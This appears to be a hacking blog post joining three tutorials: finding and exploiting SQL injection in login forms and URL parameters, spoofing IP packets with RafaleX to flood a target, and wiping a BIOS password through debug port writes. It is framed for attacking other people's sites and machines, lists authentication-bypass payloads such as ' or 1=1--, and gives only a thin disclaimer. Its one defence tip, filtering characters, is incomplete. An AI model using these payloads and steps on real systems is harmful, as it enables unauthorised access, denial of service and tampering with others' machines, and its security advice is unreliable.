What is SQL Injection?

Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have entered something say Adnan and in the password box you pass some escape characters like ',",1=1, etc... Now if the website owner hasn't handled null character strings or escape characters then user will surely get something else that owner never want their users to view.. This is basically called Blind SQL.

Requirements for SQL Injection:
1. You need a web browser to open URL and viewing source codes.
2. Need a good editor like Notepad ++ to view the source codes in colored format so that you can easily distinguish between the things.
3. And very basic knowledge of some SQL queries like SELECT, INSERT, UPDATE, DELETE etc..

What you should look into website to detect is it vulnerable to SQL injection attack or not?
First of all you can hack those websites using SQL injection hacks that allows some input fields from which can provide input to website like log in page, search page, feedback page etc. Nowadays, HTML pages use POST command to send parameters to another ASP/ASPX page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

< F O R M action=login. aspx method=post>
< i n p u t type=hidden name=user v a l u e=xyz>
< / F O R M>
Everything between the < f o r m > and < / f o r m > parameters (remove spaces in words) contains the crucial information and can help us to determine things in more detailed way.

There is alternate method for finding vulnerable website, the websites which have extension ASP, ASPX, JSP, CGI or PHP try to look for the URL's in which parameters are passed. Example is shown below:

http://example.com/login.asp?id=10

Now how to detect that this URL is vulnerable or not:
Start with single quote trick, take sample parameter as hi'or1=1--. Now in the above URL id is the parameter and 10 is its value. So when we pass hi'or1=1-- as parameter the URL will look like this:

http://example.com/login.asp?id=hi' or 1=1--

You can also do this with hidden field, for that you need to save the webpage and had to made changes to URL and parameters field and modify it accordingly. For example:

< F O R M action=http://example.com/login. asp method=p o s t >
< i n p u t type=hidden name=abc value="hi' or 1=1--">
< / F O R M >


If your luck is favoring you, you will get the login into the website without any username or password.

But why ' or 1=1-- ?
Take an asp page that will link you to another page with the following URL:

http://example.com/search.asp?category=sports

In this URL 'category' is the variable name and 'sports' is it's value.

Here this request fires following query on the database in background.

SELECT * FROM TABLE-NAME WHERE category='sports'

Where 'TABLE-NAME' is the name of table which is already present in some database.
So, this query returns all the possible entries from table 'search' which comes under the category 'sports'.

Now, assume that we change the URL into something like this:

http://example.com/search.asp?category=sports' or 1=1--

Now, our variable 'category' equals to "sports' or 1=1-- ", which fires SQL query on database something like:
SELECT * FROM search WHERE category='sports' or 1=1--'

The query should now select everything from the 'search' table regardless if category is equal to 'sports' or not.
A double dash "--" tell MS SQL server to ignore the rest of the query, which will get rid of the last hanging single quote (').
Sometimes, it may be possible to replace double dash with single hash "#".

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

It should return the same result.
Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''='

How to protect you own websites from SQL injection?

Filter out character like ' " - / \ ; NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie
That's all for today

Learn to Spoof IP Address With RafaleX and Engage Packet Builder

The RafaleX application allows for the creation of custom IP packets. The packet is very customizable and allows for the spoofing of the IP, setting the flags, number of packets, and so forth. RafaleX is becoming hard to locate on the Internet as it appears it is now called Engage Packet Builder.

The RafaleX application is an excellent way to “spoof” custom packets. Attackers can place a valid IP address as the source of the packet and the target will have to attempt to respond to the spoofed address. By sending hundreds of thousands of packets in this manner, an attacker can create a Denial of Service attack against a target.

In this example, the Source IP of the packets to be sent is set to 10.10.10.10 with the source address of port 123. According to Internet etiquette, this should never be able to route on the Internet as the 10.x.x.x range is reserved for Private addressing. Set the destination IP to the target address. In this example it is 172.16.1.40. Set the Destination
port to port 21. The SYN and ACK flags were set for each packet.

*Note: The Ethernet communications process requires a three-way handshake:

SYN: Synchronize
SYN-ACK: Synchronize-Acknowledge
ACK: Acknowledge

When a computer receives an uninitiated SYN-ACK packet its response is to send a RST (Reset) packet.

The number of packets was set to 100. Click the Send button to send the packets to the target. The Status area at the bottom left of the application will tell you that the packets were sent.



The proof is below screen shot captured from packet capturing tool:

NOTE TO THE READERS :

This Tutorial  is for educational purposes only and any actions taken By you after reading this post is all upon you. IHA takes no Charge of the Effects hereafter.

THANK YOU FOR READING

Crack BIOS password

There are a lot ways to Crack the BIOS password. This is one of them but I would say that this one ismore effective than the rest because the rest of the ways does not Guarantee you that it will Crack the BIOS password while in this case the Cracking is Guaranteed since in this we will remove the functionality of password protection of the BIOS.



Follow the steps below :
1) Boot up windows.
2) Go to command prompt directly from the windows start up menu.
3) Type the command at the prompt :
debug
4) Type the following lines now exactly as given . . . .

o 70 10
o 71 20
quit
exit
4) Exit from the dos prompt and restart the machine.
Password Protection Gone ! ! !
PS: I tested this in Award Bios . . .
There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine………..I have not found any other trouble if the codes are used. o be on safe side, just back up your data. The use of this code is entirely at ur risk. It worked fine for me.